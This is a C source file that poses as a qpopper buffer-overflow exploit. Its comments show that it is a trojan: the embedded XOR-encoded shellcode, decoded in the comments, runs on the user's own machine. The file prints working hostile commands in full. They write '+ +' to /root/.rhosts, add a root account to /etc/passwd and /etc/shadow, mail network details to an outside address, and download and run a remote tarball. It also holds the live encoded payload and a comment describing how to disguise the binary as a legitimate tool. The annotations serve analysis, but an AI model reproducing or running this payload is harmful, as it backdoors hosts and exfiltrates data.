


/*
   This is a bit of code that claims to be an
   exploit to a potential qpopper buffer
   overflow.
   
   Rather than exploiting anything on the remote
   host, it executes the embedded 'shellcode' on the
   local system with the privileges of whoever runs
   it -- and the commands below only succeed as root,
   since they write /root/.rhosts, /etc/passwd and
   /etc/shadow.

   The actual commands run by the 'shellcode' below
   (once it has XOR-decoded itself in place) are:

    d=a+.com;
    echo '+ +'>>/root/.rhosts;
    (/sbin/ifconfig -a;/bin/netstat -na)|/bin/mail
   	 h3aT@$d >/dev/null;
    rm -rf h h.tar;
    echo 'h3aT:x:0:0::/:/bin/bash' >>/etc/passwd;
    echo 'h3aT:h311hrhOKim4g::::::::'>>/etc/shadow;
    wget http://$d/h.tar;tar -xf h.tar >/dev/null;
    sh h/run.sh;
    rm -rf h
 
*/






/*
   qpopper 2.51 exploit code for Linux i386.
   You will need to try this with various offsets,
   usually somewhere between 300 and 650.
   
   To compile:   gcc -o popexp popexp.c
   Usage:  popexp hostname offset
*/

/*
 * The trojan payload.  This is not a remote qpopper exploit; it is a
 * short self-decoding x86 stub followed by an XOR-obfuscated shell
 * command, executed on the machine of whoever runs the binary.
 *
 * Layout, decoded by hand from the bytes below:
 *   - \xeb\x03 \x5e \xeb\x05 \xe8\xf8\xff\xff\xff : the jmp/call/pop
 *     trick that loads the stub's own address into %esi (position
 *     independence), then "add $0xf,%esi" to skip past the decoder.
 *   - \x31\xc9 \x66\xb9\x8c\x01 \x80\x36\x02 \x46 \xe2\xfa :
 *     xor %ecx,%ecx; mov $0x18c,%cx; xorb $0x2,(%esi); inc %esi; loop.
 *     I.e. the following ~396 bytes are XORed with the key 0x02 in place.
 *     Every byte after the decoder is therefore stored as plaintext^0x02:
 *     the \x92 runs are 0x90 NOPs, "\x2d\x60\x6b\x6c\x2d\x71\x6a" is
 *     "/bin/sh", "\x2f\x61" is "-c", and "\x66\x3f\x63\x29..." is the
 *     "d=a+.com;..." command string listed in the comment at the top
 *     of the page.
 *   - The decoded tail (\xba\x09\x02\x02\x02 -> mov $0xb,%eax,
 *     \xcf\x82 -> int $0x80) is a compiled execve() of /bin/sh -c with
 *     that command string; the first decoded instruction appears to be a
 *     jmp over the string data to that stub.
 *
 * Because the decoder writes into the array it must be in writable
 * memory, and because main() later jumps into it the same memory must
 * be executable.  On any system that enforces non-executable data
 * (NX / W^X) the call into shellcode[] simply faults.
 */
char shellcode[] = "\xeb\x03\x5e\xeb\x05\xe8\xf8\xff\xff\xff\x83\xc6\x0f\x31"
"\xc9\x66\xb9\x8c\x01\x80\x36\x02\x46\xe2\xfa\xeb\x33\x03\x02\x02\x2d\x60\x6b"
"\x6c\x2d\x71\x6a\x02\x2f\x61\x02\x92\x92\x92\x92\x92\x92\x92\x92\x92\x92\x92"
"\x92\x92\x92\x92\x92\x66\x3f\x63\x29\x2c\x61\x6d\x6f\x39\x67\x61\x6a\x6d\x22"
"\x25\x29\x22\x29\x25\x3c\x3c\x2d\x70\x6d\x6d\x76\x2d\x2c\x70\x6a\x6d\x71\x76"
"\x71\x39\x2a\x2d\x71\x60\x6b\x6c\x2d\x6b\x64\x61\x6d\x6c\x64\x6b\x65\x22\x2f"
"\x63\x39\x2d\x60\x6b\x6c\x2d\x6c\x67\x76\x71\x76\x63\x76\x22\x2f\x6c\x63\x2b"
"\x7e\x2d\x60\x6b\x6c\x2d\x6f\x63\x6b\x6e\x22\x6a\x31\x63\x56\x42\x26\x66\x22"
"\x3c\x2d\x66\x67\x74\x2d\x6c\x77\x6e\x6e\x39\x70\x6f\x22\x2f\x70\x64\x22\x6a"
"\x22\x6a\x2c\x76\x63\x70\x39\x67\x61\x6a\x6d\x22\x25\x6a\x31\x63\x56\x38\x7a"
"\x38\x32\x38\x32\x38\x38\x2d\x38\x2d\x60\x6b\x6c\x2d\x60\x63\x71\x6a\x25\x22"
"\x3c\x3c\x2d\x67\x76\x61\x2d\x72\x63\x71\x71\x75\x66\x39\x67\x61\x6a\x6d\x22"
"\x25\x6a\x31\x63\x56\x38\x6a\x31\x33\x33\x6a\x70\x6a\x4d\x49\x6b\x6f\x36\x65"
"\x38\x38\x38\x38\x38\x38\x38\x38\x25\x3c\x3c\x2d\x67\x76\x61\x2d\x71\x6a\x63"
"\x66\x6d\x75\x39\x75\x65\x67\x76\x22\x6a\x76\x76\x72\x38\x2d\x2d\x26\x66\x2d"
"\x6a\x2c\x76\x63\x70\x39\x76\x63\x70\x22\x2f\x7a\x64\x22\x6a\x2c\x76\x63\x70"
"\x22\x3c\x2d\x66\x67\x74\x2d\x6c\x77\x6e\x6e\x39\x71\x6a\x22\x6a\x2d\x70\x77"
"\x6c\x2c\x71\x6a\x39\x22\x70\x6f\x22\x2f\x70\x64\x22\x6a\x02\x39\x02\x83\xee"
"\x65\x29\x02\x02\x57\x8b\xe7\x81\xee\x12\x54\x51\xea\x02\x02\x02\x02\x59\x83"
"\xc1\xb5\x12\x02\x02\x8f\xb1\x07\xec\xfd\xfd\x8b\x77\xf2\x8f\x81\x0f\xec\xfd"
"\xfd\x8b\x47\xf6\x8f\x81\x22\xec\xfd\xfd\x8b\x47\xfa\xc5\x47\xfe\x02\x02\x02"
"\x02\x8f\x4f\xf2\xba\x09\x02\x02\x02\x33\xd0\x51\x8b\xf1\xcf\x82\x33\xc2\x8f"
"\x67\xea\x59\x5c\xcb\xc1\x92\x92\x00"

/* Function pointer that main() aims at shellcode[] and then calls, so the
 * "exploit" runs locally and never touches the network.  Old-style ()
 * parameter list: there is no prototype, so the call is unchecked. */
int (*exploit)();

/*
 * Print the usage line to stderr and terminate with exit status 1.
 *
 * argvzero: argv[0], shown as the program name in the message.
 * Never returns.  Note that the listing never #includes <stdio.h> or
 * <stdlib.h>; fprintf, stderr and exit rely on the build supplying them.
 */
void usage( char *argvzero ) {
	const char *progname = argvzero;

	(void) fprintf(stderr, "Usage: %s hostname offset\n", progname);
	exit(1);
}


/*
 * Entry point.  Despite the usage text ("hostname offset"), nothing here
 * talks to a remote host: the arguments are parsed only for show and the
 * embedded shellcode[] is executed on the local machine as the invoking
 * user.  The comment inside the body spells out the disguise.
 *
 * Review notes on this listing as given:
 *   - The argc check and the argv[2] read disagree (see inline notes), so
 *     the code as printed never reaches exploit() with the documented
 *     two-argument invocation.
 *   - Casting an lvalue ("(char*) exploit = ...") is an old GCC extension
 *     that modern compilers reject.
 *   - hostname[] is declared and never used.
 */
int main( int argc, char **argv ) {

   int offset;
   char hostname[BUFSIZ];   /* never used; part of the "legitimate tool" disguise */


	/* NOTE(review): usage() advertises two arguments, which makes argc 3,
	 * so the documented invocation always exits here.  With exactly one
	 * argument (argc == 2) the check passes but argv[2] below is the
	 * terminating NULL of argv, and atoi(NULL) is undefined behaviour. */
	if ( argc != 2 ) {
		usage(*argv);
	}
	offset = atoi( argv[2] );   /* offset is assigned but never read */
	/* Lvalue cast (GCC extension): points the function pointer at the data
	 * array, so the "exploit" target is this process, not the POP server. */
	(char*) exploit = shellcode;


	/* Include lots of code here to make it look like this
	 * program is legitimate.  Do some hostname lookups,
	 * grab the POP port from getservbyname(3), maybe
	 * even establish the POP connection, sending it
	 * random junk.  Then we run the actual exploit
	 * against the invoking user, having pointed the
	 * exploit function pointer to our shellcode above.
	 */

	/* Jumps into shellcode[], which is writable .data: the decoder rewrites
	 * the array in place and then execve()s /bin/sh -c with the command
	 * string.  This requires an executable data segment; on NX / W^X
	 * systems the call faults instead. */
	exploit();
	exit(0);


}